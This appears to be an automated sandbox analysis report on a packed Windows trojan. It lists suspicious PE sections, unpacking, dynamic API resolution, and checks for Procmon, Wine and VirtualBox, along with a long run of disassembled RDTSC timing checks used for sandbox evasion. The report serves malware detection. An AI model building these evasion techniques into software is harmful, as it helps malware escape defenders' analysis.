              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120FCE51_2_0120FCE5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0117877A1_2_0117877A
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012117CB1_2_012117CB
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01203FD91_2_01203FD9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_011FEEA91_2_011FEEA9
              Source: C:\Users\user\Desktop\file.exeCode function: String function: 00E44A60 appears 316 times
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: olrcobvx ZLIB complexity 0.9947689559108527
              Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E63A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_00E63A50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E5CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00E5CAE0
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2XZNUO5Y.htmJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1823232 > 1048576
              Source: file.exeStatic PE information: Raw size of olrcobvx is bigger than: 0x100000 < 0x1a3400

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olrcobvx:EW;fyiwyewh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;olrcobvx:EW;fyiwyewh:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E66390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00E66390
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c00db should be: 0x1c2717
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: olrcobvx
              Source: file.exeStatic PE information: section name: fyiwyewh
              Source: file.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012BC12D push edx; mov dword ptr [esp], eax1_2_012BC173
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_01285932 push eax; mov dword ptr [esp], ecx1_2_01285950
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_012F2931 push esi; mov dword ptr [esp], 253723A2h1_2_012F295F
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push edx; mov dword ptr [esp], ebp1_2_01209149
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push ebp; mov dword ptr [esp], ebx1_2_0120914D
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push edi; mov dword ptr [esp], ebp1_2_012091CD
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push 34EFDCE6h; mov dword ptr [esp], esi1_2_0120923E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push esi; mov dword ptr [esp], edx1_2_012092AF
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push eax; mov dword ptr [esp], edx1_2_012094D1
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push 29B57B30h; mov dword ptr [esp], ecx1_2_0120950B
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push 428040A8h; mov dword ptr [esp], ebx1_2_0120953D
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push 723646FFh; mov dword ptr [esp], ecx1_2_012095B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push ebx; mov dword ptr [esp], edi1_2_012095D2
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push ebp; mov dword ptr [esp], esi1_2_012095F6
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push eax; mov dword ptr [esp], ebp1_2_012096E9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push edx; mov dword ptr [esp], 2F4CE6F6h1_2_012097CA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push esi; mov dword ptr [esp], ebp1_2_012097D5
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push edi; mov dword ptr [esp], eax1_2_012097E3
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push edi; mov dword ptr [esp], edx1_2_01209800
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push edi; mov dword ptr [esp], ecx1_2_0120983C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push esi; mov dword ptr [esp], edi1_2_012098FE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push ebx; mov dword ptr [esp], esi1_2_012099E0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push 11771006h; mov dword ptr [esp], ecx1_2_01209A54
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push eax; mov dword ptr [esp], edx1_2_01209AB9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push ebp; mov dword ptr [esp], 7EF6B9A8h1_2_01209B40
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push 7D638436h; mov dword ptr [esp], edi1_2_01209C3C
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push esi; mov dword ptr [esp], eax1_2_01209C47
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push edi; mov dword ptr [esp], esi1_2_01209C67
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push 4A4D58E5h; mov dword ptr [esp], ebx1_2_01209C78
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push 75A0A2FCh; mov dword ptr [esp], ebx1_2_01209CA8
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0120911D push esi; mov dword ptr [esp], edx1_2_01209CD7
              Source: file.exeStatic PE information: section name: olrcobvx entropy: 7.953678479680492

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E66390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00E66390

              Malware Analysis System Evasion

              barindex
              Found evasive API chain (may stop execution after checking locale)
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-26190
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10901FA second address: 1090206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090206 second address: 109020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109020A second address: 1090210 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1090210 second address: 1090215 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211309 second address: 1211313 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1211313 second address: 121132A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F67787C018Dh 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121132A second address: 121132E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12178FD second address: 121791A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C0193h 0x00000009 jo 00007F67787C0186h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1217EAB second address: 1217EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1217EB1 second address: 1217EC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F67787C018Eh 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F67787C0186h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F67787C0186h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AD3B second address: 121AD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6778CEBE4Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ADE0 second address: 121AE92 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F67787C018Ch 0x00000008 je 00007F67787C0186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jg 00007F67787C019Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F67787C0198h 0x00000021 pop eax 0x00000022 jmp 00007F67787C0196h 0x00000027 push 00000003h 0x00000029 call 00007F67787C018Fh 0x0000002e jmp 00007F67787C018Ah 0x00000033 pop esi 0x00000034 push 00000000h 0x00000036 pushad 0x00000037 jno 00007F67787C018Bh 0x0000003d sub dword ptr [ebp+122D3284h], ebx 0x00000043 popad 0x00000044 mov edi, esi 0x00000046 push 00000003h 0x00000048 mov esi, ecx 0x0000004a push BFC74118h 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F67787C0194h 0x00000057 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121AE92 second address: 121AF0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F6778CEBE56h 0x0000000f popad 0x00000010 add dword ptr [esp], 0038BEE8h 0x00000017 jmp 00007F6778CEBE56h 0x0000001c lea ebx, dword ptr [ebp+1245EC3Ah] 0x00000022 mov dword ptr [ebp+122D1A42h], ebx 0x00000028 jng 00007F6778CEBE57h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B019 second address: 121B01F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B01F second address: 121B037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jc 00007F6778CEBE50h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B037 second address: 121B064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F67787C0195h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push esi 0x00000013 jo 00007F67787C0186h 0x00000019 pop esi 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B064 second address: 121B094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop eax 0x00000007 lea ebx, dword ptr [ebp+1245EC43h] 0x0000000d mov dword ptr [ebp+122D1A64h], ecx 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F6778CEBE55h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B094 second address: 121B098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B098 second address: 121B09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B09E second address: 121B0A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121B0A4 second address: 121B0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239004 second address: 123900A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12395F1 second address: 12395FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239751 second address: 1239756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239756 second address: 1239791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F6778CEBE52h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6778CEBE4Fh 0x00000014 jmp 00007F6778CEBE4Dh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12398C1 second address: 12398CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F67787C0186h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12398CB second address: 12398F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6778CEBE56h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F6778CEBE46h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239A64 second address: 1239A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239A6C second address: 1239A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F6778CEBE46h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239A7B second address: 1239AB4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b je 00007F67787C0186h 0x00000011 pop edx 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 jc 00007F67787C0186h 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F67787C0199h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239C2B second address: 1239C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6778CEBE46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239C35 second address: 1239C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239C39 second address: 1239C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F6778CEBE46h 0x00000013 jbe 00007F6778CEBE46h 0x00000019 jmp 00007F6778CEBE4Eh 0x0000001e jmp 00007F6778CEBE4Bh 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6778CEBE50h 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239C80 second address: 1239C9B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F67787C018Fh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239F80 second address: 1239F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1239F9D second address: 1239FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123A143 second address: 123A147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123A147 second address: 123A156 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212CF1 second address: 1212CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6778CEBE46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212CFB second address: 1212D25 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C0186h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F67787C018Bh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F67787C018Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212D25 second address: 1212D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212D29 second address: 1212D33 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212D33 second address: 1212D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1212D39 second address: 1212D5C instructions: 0x00000000 rdtsc 0x00000002 je 00007F67787C0186h 0x00000008 jo 00007F67787C0186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F67787C018Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123AA74 second address: 123AA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123AA78 second address: 123AA94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F67787C0196h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D48D second address: 123D493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D493 second address: 123D497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D604 second address: 123D60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D60C second address: 123D61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D61A second address: 123D624 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D624 second address: 123D65A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F67787C0191h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123C69C second address: 123C6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6778CEBE46h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D720 second address: 123D76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 jmp 00007F67787C0196h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push esi 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop esi 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f jmp 00007F67787C0193h 0x00000024 push eax 0x00000025 push edx 0x00000026 jnl 00007F67787C0186h 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 123D90F second address: 123D91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6778CEBE46h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12469FC second address: 1246A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F67787C0186h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F67787C0196h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
